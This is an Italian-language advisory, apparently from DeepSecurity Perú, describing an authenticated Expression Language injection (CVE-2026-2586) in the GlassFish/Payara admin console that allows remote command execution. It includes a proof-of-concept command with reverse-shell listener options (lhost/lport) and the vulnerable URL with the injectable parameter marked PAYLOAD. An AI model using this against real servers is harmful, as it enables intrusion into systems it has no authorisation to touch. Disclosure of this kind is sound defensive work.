RCE tramite iniezione EL autenticata in GlassFish (CVE-2026-2586)
Una vulnerabilità di iniezione di Expression Language nella console di amministrazione di GlassFish consente a un utente autenticato di iniettare espressioni EL dannose nei parametri elaborati dall'interfaccia web amministrativa. Uno sfruttamento riuscito può portare all'esecuzione remota di comandi sul server interessato.
La vulnerabilità è stata identificata nel flusso di modifica della configurazione virtuale del server, dove i parametri controllabili dall'utente vengono interpretati in modo non sicuro dall'applicazione.
Ciò accade perché:
- L'interfaccia amministrativa elabora parametri controllati dall'utente all'interno di espressioni EL.
- L'input non viene validato o neutralizzato adeguatamente prima di essere interpretato dal backend.
- Un utente autenticato nella console amministrativa può abusare del comportamento vulnerabile per invocare classi e metodi Java.
- In uno scenario di sfruttamento riuscito, un attaccante con credenziali valide potrebbe eseguire comandi sul sistema operativo sottostante.
Componente interessato
- Prodotto: Console di amministrazione GlassFish / Payara
- CVE: CVE-2026-2586
- Tipo: Iniezione di Expression Language
- Impatto: Esecuzione remota di codice autenticata
- Vettore: Interfaccia web amministrativa
Prova di concetto
Il test è stato eseguito in un ambiente locale e controllato.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
URL vulnerabile:
https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true
Legale
SOLO USO AUTORIZZATO. DeepSecurity Perú non approva l'accesso non autorizzato e non si assume alcuna responsabilità per l'uso improprio delle informazioni fornite.